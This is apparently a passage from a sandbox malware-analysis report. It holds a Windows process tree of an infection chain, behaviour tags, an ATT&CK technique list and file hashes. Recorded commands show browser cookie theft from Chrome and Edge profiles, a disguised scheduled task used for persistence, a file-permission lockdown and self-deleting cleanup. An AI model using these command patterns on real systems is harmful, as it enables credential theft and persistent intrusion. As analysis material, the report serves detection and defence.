                                                                              "C:\Program Files\Microsoft Office\WPZCFJCWOQ\ultramediaburner.exe" /VERYSILENT
                                                                              12⤵
                                                                                PID:7156
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-679TJ.tmp\ultramediaburner.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-679TJ.tmp\ultramediaburner.tmp" /SL5="$40340,281924,62464,C:\Program Files\Microsoft Office\WPZCFJCWOQ\ultramediaburner.exe" /VERYSILENT
                                                                                  13⤵
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:6832
                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                    14⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6248
                                                                              • C:\Users\Admin\AppData\Local\Temp\70-14c35-220-a5db5-d5ec6757d03c9\Nogokygaqi.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\70-14c35-220-a5db5-d5ec6757d03c9\Nogokygaqi.exe"
                                                                                12⤵
                                                                                • Checks computer location settings
                                                                                PID:4104
                                                                              • C:\Users\Admin\AppData\Local\Temp\8c-71b5a-730-fb6a9-b18c2d404e753\Bixiromajae.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\8c-71b5a-730-fb6a9-b18c2d404e753\Bixiromajae.exe"
                                                                                12⤵
                                                                                • Modifies system certificate store
                                                                                PID:5216
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cf1uw2rl.xgw\GcleanerEU.exe /eufive & exit
                                                                                  13⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2008
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0sbyyxso.20p\installer.exe /qn CAMPAIGN="654" & exit
                                                                                  13⤵
                                                                                    PID:5424
                                                                                    • C:\Users\Admin\AppData\Local\Temp\0sbyyxso.20p\installer.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\0sbyyxso.20p\installer.exe /qn CAMPAIGN="654"
                                                                                      14⤵
                                                                                        PID:6616
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5txpowp0.tyh\ufgaa.exe & exit
                                                                                      13⤵
                                                                                        PID:5408
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5txpowp0.tyh\ufgaa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\5txpowp0.tyh\ufgaa.exe
                                                                                          14⤵
                                                                                            PID:7096
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              15⤵
                                                                                                PID:7896
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                15⤵
                                                                                                  PID:7364
                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  15⤵
                                                                                                    PID:7852
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    15⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5596
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hj1drvo5.ejs\anyname.exe & exit
                                                                                                13⤵
                                                                                                  PID:7608
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\hj1drvo5.ejs\anyname.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\hj1drvo5.ejs\anyname.exe
                                                                                                    14⤵
                                                                                                      PID:7748
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\hj1drvo5.ejs\anyname.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\hj1drvo5.ejs\anyname.exe" -q
                                                                                                        15⤵
                                                                                                          PID:7888
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ykc3klyy.xgl\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                      13⤵
                                                                                                        PID:7820
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ykc3klyy.xgl\installer.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\ykc3klyy.xgl\installer.exe /qn CAMPAIGN=654
                                                                                                          14⤵
                                                                                                            PID:8084
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bwlgp1k5.xh2\app.exe /8-2222 & exit
                                                                                                          13⤵
                                                                                                            PID:8008
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bwlgp1k5.xh2\app.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\bwlgp1k5.xh2\app.exe /8-2222
                                                                                                              14⤵
                                                                                                                PID:8144
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bwlgp1k5.xh2\app.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\bwlgp1k5.xh2\app.exe" /8-2222
                                                                                                                  15⤵
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:7704
                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Enumerates connected drives
                                                                                                      • Modifies system certificate store
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:5504
                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628204644 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                        10⤵
                                                                                                          PID:7076
                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5368
                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                                          10⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4604
                                                                                                • C:\Users\Admin\Documents\8120t2sI5prhXbETRKAfJPfR.exe
                                                                                                  "C:\Users\Admin\Documents\8120t2sI5prhXbETRKAfJPfR.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4964
                                                                                                  • C:\Users\Admin\AppData\Roaming\1361411.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1361411.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3468
                                                                                                  • C:\Users\Admin\AppData\Roaming\6185623.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\6185623.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4672
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1080
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8FB27DA4\sonia_6.exe
                                                                                                sonia_6.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:3912
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2396
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3304
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                              4⤵
                                                                                                PID:2136
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 544
                                                                                                4⤵
                                                                                                • Program crash
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3612
                                                                                        • c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                          1⤵
                                                                                            PID:2844
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                            1⤵
                                                                                              PID:2780
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                              1⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2760
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                              1⤵
                                                                                                PID:2464
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                1⤵
                                                                                                  PID:2436
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                  1⤵
                                                                                                    PID:1884
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                    1⤵
                                                                                                      PID:1380
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                      1⤵
                                                                                                        PID:1156
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                        1⤵
                                                                                                          PID:1104
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:680
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            2⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:8048
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              3⤵
                                                                                                                PID:4428
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                  4⤵
                                                                                                                  • Creates scheduled task(s)
                                                                                                                  PID:7304
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4500
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                3⤵
                                                                                                                  PID:5812
                                                                                                              • C:\Users\Admin\AppData\Local\3acb002a-a10f-4649-b4da-a33b74a9a01c\79E4.exe
                                                                                                                C:\Users\Admin\AppData\Local\3acb002a-a10f-4649-b4da-a33b74a9a01c\79E4.exe --Task
                                                                                                                2⤵
                                                                                                                  PID:6332
                                                                                                                  • C:\Users\Admin\AppData\Local\3acb002a-a10f-4649-b4da-a33b74a9a01c\79E4.exe
                                                                                                                    C:\Users\Admin\AppData\Local\3acb002a-a10f-4649-b4da-a33b74a9a01c\79E4.exe --Task
                                                                                                                    3⤵
                                                                                                                      PID:5356
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    2⤵
                                                                                                                      PID:8140
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        3⤵
                                                                                                                          PID:5768
                                                                                                                      • C:\Users\Admin\AppData\Roaming\igaedcw
                                                                                                                        C:\Users\Admin\AppData\Roaming\igaedcw
                                                                                                                        2⤵
                                                                                                                          PID:5264
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                          2⤵
                                                                                                                            PID:7780
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                              3⤵
                                                                                                                                PID:4784
                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                            1⤵
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                            PID:400
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                              2⤵
                                                                                                                                PID:4168
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                2⤵
                                                                                                                                • Drops file in System32 directory
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Modifies registry class
                                                                                                                                PID:4688
                                                                                                                            • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:2792
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:3672
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:2168
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Adds Run key to start application
                                                                                                                                PID:5520
                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                  icacls "C:\Users\Admin\AppData\Local\3acb002a-a10f-4649-b4da-a33b74a9a01c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                  3⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:2812
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\79E4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:6972
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\79E4.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\79E4.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies extensions of user files
                                                                                                                                    PID:6760
                                                                                                                                    • C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build2.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build2.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:6308
                                                                                                                                      • C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build2.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build2.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:6164
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:6352
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:6324
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 6
                                                                                                                                              8⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:6544
                                                                                                                                      • C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build3.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build3.exe"
                                                                                                                                        5⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:6800
                                                                                                                                        • C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build3.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\f41c7eae-ff6a-4fe1-9d29-623cae6bdd01\build3.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:7040
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:7084
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8AFC.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8AFC.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5608
                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                1⤵
                                                                                                                                • Enumerates connected drives
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                • Modifies registry class
                                                                                                                                PID:6100
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 00F1B3F7CF24A4849672E2AF3CDB7433 C
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5784
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 5140AA84C2CA4A6F6A5F07203672249C
                                                                                                                                  2⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:6472
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                    3⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:2916
                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 30421399DF6D6C0EC9C6D1E1DFD5F977 E Global\MSI0000
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:6552
                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:5840
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  2⤵
                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5388
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                PID:6992
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                1⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:6756
                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                PID:5528
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:7372
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                • Modifies registry class
                                                                                                                                PID:7488
                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:7864
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:7900
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:6360
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:6288

                                                                                                                                  Network

                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                  Execution

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Persistence

                                                                                                                                  Modify Existing Service

                                                                                                                                  1
                                                                                                                                  T1031

                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                  1
                                                                                                                                  T1060

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Privilege Escalation

                                                                                                                                  Scheduled Task

                                                                                                                                  1
                                                                                                                                  T1053

                                                                                                                                  Defense Evasion

                                                                                                                                  Modify Registry

                                                                                                                                  4
                                                                                                                                  T1112

                                                                                                                                  Disabling Security Tools

                                                                                                                                  1
                                                                                                                                  T1089

                                                                                                                                  File Permissions Modification

                                                                                                                                  1
                                                                                                                                  T1222

                                                                                                                                  BITS Jobs

                                                                                                                                  1
                                                                                                                                  T1197

                                                                                                                                  Install Root Certificate

                                                                                                                                  1
                                                                                                                                  T1130

                                                                                                                                  Credential Access

                                                                                                                                  Credentials in Files

                                                                                                                                  3
                                                                                                                                  T1081

                                                                                                                                  Discovery

                                                                                                                                  Software Discovery

                                                                                                                                  1
                                                                                                                                  T1518

                                                                                                                                  Query Registry

                                                                                                                                  5
                                                                                                                                  T1012

                                                                                                                                  System Information Discovery

                                                                                                                                  6
                                                                                                                                  T1082

                                                                                                                                  Security Software Discovery

                                                                                                                                  1
                                                                                                                                  T1063

                                                                                                                                  Peripheral Device Discovery

                                                                                                                                  2
                                                                                                                                  T1120

                                                                                                                                  Collection

                                                                                                                                  Data from Local System

                                                                                                                                  3
                                                                                                                                  T1005

                                                                                                                                  Command and Control

                                                                                                                                  Web Service

                                                                                                                                  1
                                                                                                                                  T1102

                                                                                                                                  Replay Monitor

                                                                                                                                  Loading Replay Monitor...

                                                                                                                                  Downloads

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                    MD5

                                                                                                                                    b2a6b0c933fd8fb421318d4080c20262

                                                                                                                                    SHA1

                                                                                                                                    245cefa2b343acc531898fcca13c78e836ddf281

                                                                                                                                    SHA256

                                                                                                                                    85e669932e66b977adbee034a3d9af1e8872174e25b9df2c698869545179ea0e

                                                                                                                                    SHA512

                                                                                                                                    fb279fb87b493c4453994dae3feeb870222ccf931dc10e93ae372ed851451f9691e2c1ce5460a4e948b68523a346a655c5ea40cc089f559f3248757777d46013

                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                    MD5

                                                                                                                                    ab7c942b61a01c9652c16d318283206a

                                                                                                                                    SHA1

                                                                                                                                    8f6e89a9080cc1586a52e7729190f022b31b13c1

                                                                                                                                    SHA256

                                                                                                                                    59b216716d6cb1d2971864785218eb6cd60248cf24a62a63c5633be6e0e04b25

                                                                                                                                    SHA512

